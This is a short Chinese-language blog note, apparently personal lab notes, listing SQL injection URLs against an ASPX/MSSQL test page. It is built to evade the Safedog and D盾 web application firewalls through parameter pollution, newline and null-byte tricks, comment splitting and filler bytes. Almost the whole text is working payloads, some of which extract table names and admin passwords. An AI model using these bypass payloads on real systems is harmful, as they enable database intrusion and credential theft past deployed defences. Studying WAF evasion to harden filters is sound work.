ASPX Bypass 安全狗/D盾

4_21前言：之前只好好的学过mysql注入，最近想把mssql注入学一遍，顺便试试能否绕过安全狗/D盾

第一种：HPP参数污染 + 换行符%0a + msssql特性

初步绕过：

http://192.168.1.167/aspxmssql/sql.aspx?id=1e2union/*&id=*/--xxx%0a/**/all select user,'2','3'

.符号修饰绕过，下面的语句只能靠.来进行绕过

http://192.168.1.167/aspxmssql/sql.aspx?id=1e2union/*&id=*/--xxx%0a/**/all select table_name,'2','3' from (select table_name from.information_schema.tables where table_name != 'cmd')a

http://192.168.1.167/aspxmssql/sql.aspx?id=1e2union/*&id=*/--xxx%0a/**/all select(select top 2 table_name from.information_schema.tables where table_name != 'cmd'),'2','3';

第二种：注释符 + 单引号

关键词：--x%0a

http://192.168.1.167/aspxmssql/sql.aspx?id=-1e-union--x%0aall(select table_name,'2','3' from information_schema.tables)

http://192.168.1.167/aspxmssql/sql.aspx?id=-1e-union--x%0aall(select username,'2','3' from admin where id=1) //这里整形加上单引号才能绕过！

第三种：fuzz空白/填充符 + ALL/DISTINCT筛选

关键词：[0x00-0x20]

http://192.168.1.167/aspxmssql/sql.aspx?id=-1e-union%01all select table_name,'2','3' from information_schema.tables

http://192.168.1.167/aspxmssql/sql.aspx?id=-1e-union%01all select password,'2','3' from admin where id=1

到了这里继续测试D盾，环境真糟糕，08r2的机器竟然无法安装D盾

第一种：HPP参数污染 + %00截断干扰 + 换行符

http://192.168.1.165/aspxmssql/sql.aspx/a.jsp?id=1e2%00%0aunion--%23&id=%00%0aall--%23&id=%00%0aselect @@version,'2','3'

出数据：http://192.168.1.165/aspxmssql/sql.aspx/a.jsp?id=1e2%00%0aunion--%23&id=%00%0aall--%23&id=%00%0a(select password,'2','3' from admin where id=1)